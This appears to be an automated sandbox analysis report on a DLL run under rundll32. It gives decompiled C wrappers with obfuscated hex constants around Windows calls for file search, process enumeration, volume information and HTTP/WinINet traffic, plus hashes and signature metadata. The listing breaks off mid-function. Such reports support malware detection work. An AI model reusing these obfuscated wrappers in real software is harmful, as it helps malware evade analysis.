Instruction Fuzzy Hash: 652127B5D0020CFFDB04DFA4D94A9EEBBB4EB44304F108189E425B7240E3B56B049F91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4316 Parent PID: 4248 rundll32.exeCOMMON

Executed Functions

Function 10011A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
fileCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E10011A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10022523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E10002309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}

0x10011a88
0x10011a8b
0x10011a8d
0x10011a90
0x10011a93
0x10011a96
0x10011a98
0x10011a9d
0x10011aac
0x10011ab1
0x10011ab2
0x10011ab9
0x10011aba
0x10011acb
0x10011ace
0x10011ad2
0x10011ad9
0x10011ae0
0x10011ae7
0x10011af9
0x10011afc
0x10011b03
0x10011b0a
0x10011b11
0x10011b18
0x10011b1f
0x10011b26
0x10011b2d
0x10011b40
0x10011b4c
0x10011b53

APIs

FindFirstFileW.KERNEL32(1000CC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 10011B4C

Strings

Lx@, xrefs: 10011A9D

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileFindFirst
String ID: Lx@
API String ID: 1974802433-402333656
Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction ID: 4c909c8dcac535ec2e4d3c8be887b4ad64c8f6e64b414c256e7081c5313808d4
Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
Instruction Fuzzy Hash: B1212575D01219FBEB18CFA5DC4A9DEBFB5FB44300F008199E811A6260D3B59B54DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10021027, Relevance: 1.6, APIs: 1, Instructions: 57
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10021027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10022523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E10002309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}

0x1002102e
0x10021031
0x10021033
0x10021036
0x10021039
0x1002103c
0x1002103f
0x10021043
0x10021044
0x10021049
0x10021053
0x1002105c
0x10021063
0x10021067
0x1002106e
0x10021075
0x1002107c
0x10021083
0x1002108a
0x1002108e
0x10021095
0x100210a1
0x100210a9
0x100210ac
0x100210b0
0x100210b7
0x100210d7
0x100210e9
0x100210ef

APIs

InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 100210E9

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction ID: 23d0799d30c03751676f61c09586855f1f5435a61959109e3edcdfa144fe7809
Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
Instruction Fuzzy Hash: 8A2113B6D00209FBDF06DFE4C94A8EEBBB1EF44300F508189F92566251E3B55B61EB91

Uniqueness

Uniqueness Score: -1.00%

Function 10011B54, Relevance: 1.5, APIs: 1, Instructions: 47
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E10002309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}

0x10011b5a
0x10011b60
0x10011b67
0x10011b6e
0x10011b75
0x10011b7c
0x10011b80
0x10011b8a
0x10011b91
0x10011b94
0x10011b9b
0x10011ba2
0x10011ba9
0x10011bb0
0x10011bb7
0x10011bc4
0x10011bc7
0x10011bce
0x10011bd5
0x10011bdc
0x10011be3
0x10011bfd
0x10011c0a
0x10011c0f

APIs

CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 10011C0A

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction ID: 9081da046f3271a085e2fa5fb81bd71d4906930810acfb0f456372ca571504a1
Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
Instruction Fuzzy Hash: 8B11F3B1D0520CEBDB18DFA8C94A6AEBBB0FF44304F108199E521B72A0D7B56B04DF50

Uniqueness

Uniqueness Score: -1.00%

Function 100054DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100054DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E10002309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}

0x100054e0
0x100054e3
0x100054e6
0x100054eb
0x100054f0
0x100054f7
0x10005500
0x10005507
0x1000550e
0x10005515
0x1000551c
0x10005523
0x1000552c
0x10005531
0x10005536
0x1000553d
0x10005544
0x1000554b
0x10005552
0x10005559
0x10005560
0x10005567
0x1000556b
0x10005572
0x10005575
0x1000557d
0x10005580
0x1000559e
0x100055a9
0x100055ae

APIs

InternetCloseHandle.WININET(007528C6), ref: 100055A9

Strings

Lp, xrefs: 10005500
-5, xrefs: 1000554B
{ja, xrefs: 10005572

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseHandleInternet
String ID: -5$Lp${ja
API String ID: 1081599783-1222928185
Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction ID: e6c55e4df9d10131ec682d11da997c923e435672ca5001c5aadfd6cedd8f9d11
Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
Instruction Fuzzy Hash: 4B2104B6D0120DFBEF04CFE5C94AAAEBBB1FB10314F108199E420A6251E3B95B14CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001F606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001F606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E10002309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}

0x1001f60d
0x1001f610
0x1001f612
0x1001f615
0x1001f616
0x1001f617
0x1001f61c
0x1001f623
0x1001f627
0x1001f62e
0x1001f635
0x1001f639
0x1001f650
0x1001f653
0x1001f65a
0x1001f661
0x1001f668
0x1001f66f
0x1001f676
0x1001f67d
0x1001f684
0x1001f68b
0x1001f692
0x1001f699
0x1001f6a0
0x1001f6a7
0x1001f6c0
0x1001f6cc
0x1001f6d2

APIs

Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 1001F6CC

Strings

Cn/, xrefs: 1001F6A7
YCD., xrefs: 1001F668
l9E[, xrefs: 1001F68B

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FirstProcess32
String ID: YCD.$l9E[$Cn/
API String ID: 2623510744-4191728293
Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction ID: e259f347f79b612dfbf7f188fd4e3a77e73ae6d79840be04f149529e315639f7
Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
Instruction Fuzzy Hash: 802133BAC01219EBCF08CFE4E98A9AEBBB4FF10715F108689E415B6211D3745B10DF91

Uniqueness

Uniqueness Score: -1.00%

Function 1001A809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1001A809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E10022523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
				E10002309(0x1c8, __ecx, __ecx, 0xfc0d3d9c, __ecx, 0x9c9047d0);
				_t55 = GetVolumeInformationW(_a16, 0, 0, _t60, 0, 0, 0, 0); // executed
				return _t55;
			}

0x1001a813
0x1001a815
0x1001a816
0x1001a817
0x1001a81a
0x1001a81d
0x1001a81e
0x1001a81f
0x1001a822
0x1001a825
0x1001a828
0x1001a82b
0x1001a82e
0x1001a82f
0x1001a831
0x1001a832
0x1001a837
0x1001a841
0x1001a848
0x1001a84b
0x1001a84e
0x1001a855
0x1001a86c
0x1001a86f
0x1001a876
0x1001a87d
0x1001a884
0x1001a88b
0x1001a892
0x1001a8a3
0x1001a8a6
0x1001a8aa
0x1001a8ae
0x1001a8b5
0x1001a8c0
0x1001a8c3
0x1001a8d6
0x1001a8e8
0x1001a8ef

APIs

GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 1001A8E8

Strings

,r, xrefs: 1001A837
cu_, xrefs: 1001A855

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: InformationVolume
String ID: ,r$cu_
API String ID: 2039140958-355032270
Opcode ID: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction ID: 2d9077e8843d46ea74a564eef62e93d3853f66a41997d5942974fc7a547dbb6c
Opcode Fuzzy Hash: 11f0a768391377fe69868ce35b1527178b61e9fcd2d284546a7f3ae16540a2da
Instruction Fuzzy Hash: 7F21E0B1801249BBCF14CFA6DD49CDFBFB9EB86704F108199F910A2220D3B59A15DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000BEDE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

QueryFullProcessImageNameW.KERNEL32(007CD4C5,00000000,00000000,31305EC1), ref: 1000BFB0

Strings

^.c, xrefs: 1000BF25
=., xrefs: 1000BF6D

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FullImageNameProcessQuery
String ID: =.$^.c
API String ID: 3578328331-3776521896
Opcode ID: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
Instruction ID: 7275a9ed560c09780dabca557c474df7feafaa640da0da3fdedc6977ea339cbe
Opcode Fuzzy Hash: 07ae75dd8ddba432c77965de32a51c1b19153ce4c2545f6c391e89c1662625bf
Instruction Fuzzy Hash: 40213475C00209FBDF18CFA4C84AAEEBFB1FB40704F208588E91476250D3B19B619F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FBFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000FBFA(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t48;
				int _t57;
				signed int _t59;

				_push(_a8);
				_push(_a4);
				E10022523(_t48);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x49672e;
				_v32 = 0xb6dd69;
				_v16 = 0x714492;
				_v16 = _v16 >> 4;
				_v16 = _v16 + 0x8cae;
				_v16 = _v16 + 0xf12f;
				_v16 = _v16 ^ 0x0001c43a;
				_v20 = 0xe1aff5;
				_v20 = _v20 + 0x563d;
				_v20 = _v20 ^ 0x00ec4f92;
				_v12 = 0xff415;
				_v12 = _v12 + 0x39cf;
				_v12 = _v12 | 0x79f6ff5d;
				_v12 = _v12 ^ 0x79f7d296;
				_v8 = 0xdebe32;
				_t59 = 0x1e;
				_v8 = _v8 / _t59;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 ^ 0x0002d9b6;
				E10002309(0x336, _t59, _t59, 0xd09d8658, _t59, 0x9c9047d0);
				_t57 = FindClose(_a8); // executed
				return _t57;
			}

0x1000fc00
0x1000fc03
0x1000fc08
0x1000fc0d
0x1000fc14
0x1000fc1a
0x1000fc21
0x1000fc28
0x1000fc2f
0x1000fc33
0x1000fc3a
0x1000fc41
0x1000fc48
0x1000fc4f
0x1000fc56
0x1000fc5d
0x1000fc64
0x1000fc6b
0x1000fc72
0x1000fc79
0x1000fc85
0x1000fc8d
0x1000fc90
0x1000fc94
0x1000fc98
0x1000fcb8
0x1000fcc3
0x1000fcc8

APIs

FindClose.KERNEL32(0001C43A), ref: 1000FCC3

Strings

.gI, xrefs: 1000FC1A
=V, xrefs: 1000FC4F

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CloseFind
String ID: .gI$=V
API String ID: 1863332320-2530093900
Opcode ID: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction ID: 13a99136c5b08d47dc1f4c8c5ed125b3ab52959e5c24daba2c8c9d4d8457441f
Opcode Fuzzy Hash: 110af252eeec9babbf3e3997d431909c73a56f909e67471b0c3fb51db6a30985
Instruction Fuzzy Hash: 8B2133B5D0020CEFEB04CFD5D94AAEEBBB0FB54318F10C199E52466240E3B95B589F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001E9E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50
fileCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E1001E9E8(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t39;
				int _t47;
				void* _t51;

				_push(_a16);
				_t51 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10022523(_t39);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x7dd1c2;
				_v20 = 0xe6ed41;
				_v20 = _v20 ^ 0x6eedbecd;
				_v20 = _v20 * 0x45;
				_v20 = _v20 ^ 0xa90eba26;
				_v16 = 0x25fde1;
				_v16 = _v16 + 0xffffc5d1;
				_v16 = _v16 | 0x325ad611;
				_v16 = _v16 ^ 0x3277e624;
				_v8 = 0x448e1b;
				_v8 = _v8 | 0xd7f3ffef;
				_v8 = _v8 ^ 0xcff08007;
				_v8 = _v8 ^ 0x180d74c6;
				_v12 = 0x3a9cbc;
				_v12 = _v12 | 0xfe729dd7;
				_v12 = _v12 ^ 0xfe7a3202;
				E10002309(0x2de, __ecx, __ecx, 0xa7d3fbc8, __ecx, 0x9c9047d0);
				_t47 = FindNextFileW(_t51, _a4); // executed
				return _t47;
			}

0x1001e9ef
0x1001e9f2
0x1001e9f4
0x1001e9f7
0x1001e9fa
0x1001e9fe
0x1001e9ff
0x1001ea04
0x1001ea0b
0x1001ea12
0x1001ea19
0x1001ea30
0x1001ea33
0x1001ea3a
0x1001ea41
0x1001ea48
0x1001ea4f
0x1001ea56
0x1001ea5d
0x1001ea64
0x1001ea6b
0x1001ea72
0x1001ea79
0x1001ea80
0x1001ea99
0x1001eaa5
0x1001eaab

APIs

FindNextFileW.KERNELBASE(00000000,FE7A3202,?,?,?,?,?,?,?,?,?,?,00000072), ref: 1001EAA5

Strings

A, xrefs: 1001EA12
$w2, xrefs: 1001EA4F

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileFindNext
String ID: $w2$A
API String ID: 2029273394-2068021171
Opcode ID: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction ID: dada94e113a69792e10164e03f2a25d9c6497d738665c24ecae0a8d857d7b4ee
Opcode Fuzzy Hash: 489ae82eb01001db2e27a8813198e8620566e78ec9ea4fd3dbf43d66dbc97652
Instruction Fuzzy Hash: 75110DB5C0121DABCF05DFE8DA068AEBFB4FB00300F108589E915A6260E3B55B209FA5

Uniqueness

Uniqueness Score: -1.00%

Function 10008A5E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E10008A5E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a24, WCHAR* _a36, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, WCHAR* _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t45;
				void* _t52;
				void* _t57;

				_push(_a56);
				_t57 = __edx;
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t45);
				_v32 = 0xd5d112;
				_v28 = 0x50513d;
				_v24 = 0;
				_v12 = 0x46c43;
				_v12 = _v12 + 0xffffdfef;
				_v12 = _v12 | 0x9d8b3e1d;
				_v12 = _v12 ^ 0x9d8347af;
				_v20 = 0x816eb9;
				_v20 = _v20 + 0xffff29e2;
				_v20 = _v20 ^ 0x0080c9d8;
				_v8 = 0x807982;
				_v8 = _v8 | 0x5015719e;
				_v8 = _v8 ^ 0xfbfa9e2f;
				_v8 = _v8 ^ 0xab6f9dce;
				_v16 = 0xec1576;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x000e8763;
				E10002309(0x18c, __ecx, __ecx, 0xb50c381d, __ecx, 0xc0cf1a4);
				_t52 = HttpOpenRequestW(_t57, _a36, _a56, 0, 0, 0, _a24, 0); // executed
				return _t52;
			}

0x10008a66
0x10008a6b
0x10008a6d
0x10008a70
0x10008a73
0x10008a76
0x10008a77
0x10008a7a
0x10008a7b
0x10008a7c
0x10008a7f
0x10008a80
0x10008a83
0x10008a86
0x10008a89
0x10008a8c
0x10008a8d
0x10008a8e
0x10008a93
0x10008a9d
0x10008aa4
0x10008aa7
0x10008aae
0x10008ab5
0x10008abc
0x10008ac3
0x10008aca
0x10008ad1
0x10008ad8
0x10008adf
0x10008ae6
0x10008aed
0x10008af4
0x10008afb
0x10008aff
0x10008b24
0x10008b3a
0x10008b41

APIs

HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00000000,00D5D112,00000000), ref: 10008B3A

Strings

=QP, xrefs: 10008A9D

Memory Dump Source

Source File: 00000008.00000002.886499848.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.886480265.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.886534682.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: HttpOpenRequest
String ID: =QP
API String ID: 1984915467-456757808
Opcode ID: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction ID: e3fac8015c3a145f5e17db1b8b22e466714549d15e7afe1ebd96c96d83fff2fb
Opcode Fuzzy Hash: 4cc3d4786cdcc23149290c3469cd4bf7c683ba33055c948049ab044fbc38bf75
Instruction Fuzzy Hash: E321F0B2801208BB8F559F95CC4ACDFBF79EF85700F108148B914A6221D3B18A65DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000F2CC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57
networkCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E1000F2CC(void* __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				void* __ecx;
				void* _t36;
				void* _t44;
				void* _t46;

				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t36);
				_v28 = 0x481ca4;
				_v24 = 0;
				_v20 = 0xca1952;
				_v20 = _v20 ^ 0x1684c8f8;
				_v20 = _v20 ^ 0x16482d99;
				_v12 = 0xc193bc;
				_v12 = _v12 ^ 0x27e4a297;
				_v12 = _v12 | 0xa7673761;
				_v12 = _v12 ^ 0xa76f04da;
				_v8 = 0xc5b902;
				_push(0xc0cf1a4);
				_push(_t45);
				_push(0xb325898b);
				_push(_t45);
				_v8 = _v8 * 0x4e;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03c56f69;
				_v16 = 0x24ec4f;
				_v16 = _v16 + 0xffffc13d;
				_v16 = _v16 ^ 0x002fbbc3;
				_push(_t45);
				_t46 = 0x50;
				E10002309(_t46);
				_t44 = InternetOpenW(0, _a12, 0, 0, 0); // executed
				return _t44;
			}

0x1000f2d3
0x1000f2d8
0x1000f2d9
0x1000f2da
0x1000f2db
0x1000f2dc
0x1000f2df
0x1000f2e2
0x1000f2e7
0x1000f2ec
0x1000f2f6
0x1000f2f9
0x1000f300
0x1000f307
0x1000f30e
0x1000f315
0x1000f31c
0x1000f323
0x1000f32a
